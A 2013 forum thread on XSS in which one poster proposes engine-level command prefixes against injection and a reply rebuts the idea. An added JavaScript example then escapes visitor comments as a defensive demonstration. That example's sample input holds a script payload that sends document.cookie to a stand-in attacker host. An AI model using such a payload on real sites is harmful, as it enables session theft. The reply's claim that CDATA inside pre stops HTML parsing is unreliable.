
XSS against nature

Posted by AvenidaGez 
March 13, 2013 11:21PM

Having spent years programming, all this about XSS makes me sadder day by day. It is understandable that there is no security in any matter: the car, the house, anything is insecure one way or another, but getting up to these levels goes beyond my mind. Of course there are many reasons to protect.

Among the more difficult aspects I have known is overflow, which is related mostly to system structure. Code injection? Many years ago, I thought there could be, in the engine (PHP or whatever), a prefix and/or suffix for all commands, as simple as having it in php.ini, related to the engine. And of course, from the manual to PHP editors, everything would handle those prefixes and suffixes. That way there would be no problem with any injection: hard to find your assigned prefixes to commands, fast code, no need to clean, no need for anything.

Isn't it the same as what Java P-code, the PHP interpreter, JavaScript or any other does? If it is not compiled it is interpreted; if it is interpreted you have a translation table, so there could be prefixes, renames and suffixes, which I don't believe a hacker will take the time to find out.

For now, I need to know how to let a visitor write code in comments (not functional code) with this thing that looks like an antivirus, which one ends up turning off because in the end it does not let you work. I do not find how. We need to be secure to some degree, but not live in a self-sanitized jail against viruses.

Re: XSS against nature
March 24, 2013 05:21PM

Errrr, short answer: nope. It's not the same for each. For one, JavaScript is a client-side language, PHP is a server-side language. Sometimes it's not a particular issue with the server script, but could be a flaw in the browser itself. JavaScript is a dangerous language to allow untrusted users to use, more so because it's client-side, which means not only can it destroy the integrity of your server, but it can also destroy the integrity of anyone who happens to be viewing a page. They might not even be aware; they don't have to click a link or do anything. Simply viewing or opening a page is all it takes where JavaScript is concerned. Same with Java.

But prefixes and suffixes will not prevent XSS at all, just like they don't protect against SQL injection. Hiding the path doesn't help, because if you rely on that and somehow someone finds a user form field or URL $_GET/$_REQUEST they can exploit, it doesn't take much to then create a crafty SQL query which will intentionally create an error, which then reveals your DB prefix and/or leads to path disclosure. You will never be 100% secure, but you should aim to make it as inconvenient as possible.

If you want to let visitors write code in comments, then use pre with CDATA. That way it won't be parsed; it will just be displayed as is.
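As an added example (not code from either poster), here is the reply's advice in code form: comment text is HTML-escaped so the browser treats it as text, and any section the visitor wrapped in `<![CDATA[ ... ]]>` is escaped too and emitted inside `<pre>`, so a `<script>` typed into a comment is displayed rather than executed. The naive renderer beside it shows why the original post's prefix/suffix idea changes nothing: the browser runs whatever markup reaches the page, whatever the server calls its functions. The function names and the sample comment are constructed for this example.

```javascript
// Added example, not code from the thread: render visitor-supplied
// comments so that markup and <script> in them are displayed, never executed.

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute. '&' goes first so the others are not double-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The naive renderer: untrusted text is concatenated straight into markup.
// Whatever the visitor typed becomes part of the page's DOM.
function renderCommentUnsafe(comment) {
  return `<div class="comment"><p>${comment}</p></div>`;
}

// The renderer the reply recommends, in code form: everything is escaped,
// and sections wrapped in <![CDATA[ ... ]]> go into <pre> so newlines and
// indentation of the posted code survive. The CDATA markers themselves are
// stripped; they are a posting convention, not something the browser sees.
// Anything after an unmatched marker simply falls through as escaped text.
function renderCommentSafe(comment) {
  const cdata = /<!\[CDATA\[([\s\S]*?)\]\]>/g;
  const parts = [];
  let last = 0;
  for (const m of comment.matchAll(cdata)) {
    if (m.index > last) {
      parts.push(`<p>${escapeHtml(comment.slice(last, m.index))}</p>`);
    }
    parts.push(`<pre>${escapeHtml(m[1])}</pre>`);
    last = m.index + m[0].length;
  }
  if (last < comment.length) {
    parts.push(`<p>${escapeHtml(comment.slice(last))}</p>`);
  }
  return `<div class="comment">${parts.join('')}</div>`;
}

// A cheap check used below: does the rendered HTML still contain a live
// script element? Tag names are case-insensitive, hence the /i flag.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample comment: a PHP snippet in CDATA plus an XSS attempt
// typed outside it, the way a hostile visitor would.
const SAMPLE_COMMENT = [
  'Here is my PHP snippet:',
  '<![CDATA[<?php echo "<b>$name</b>"; ?>]]>',
  'and a payload: <SCRIPT>document.location="http://attacker.example/?c="+document.cookie</SCRIPT>',
].join('\n');

console.log('unsafe :', renderCommentUnsafe(SAMPLE_COMMENT));
console.log('safe   :', renderCommentSafe(SAMPLE_COMMENT));
console.log('script survives? unsafe =', containsScriptTag(renderCommentUnsafe(SAMPLE_COMMENT)),
            '| safe =', containsScriptTag(renderCommentSafe(SAMPLE_COMMENT)));
```

Run it with `node` and compare the two outputs: the unsafe rendering still carries a live `<SCRIPT>` element, while the safe one shows the same text as `&lt;SCRIPT&gt;...` inside a paragraph and the PHP snippet as escaped text inside `<pre>`. Escaping at output time is what removes the problem; the visitor is free to type anything, and none of it is interpreted as markup.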
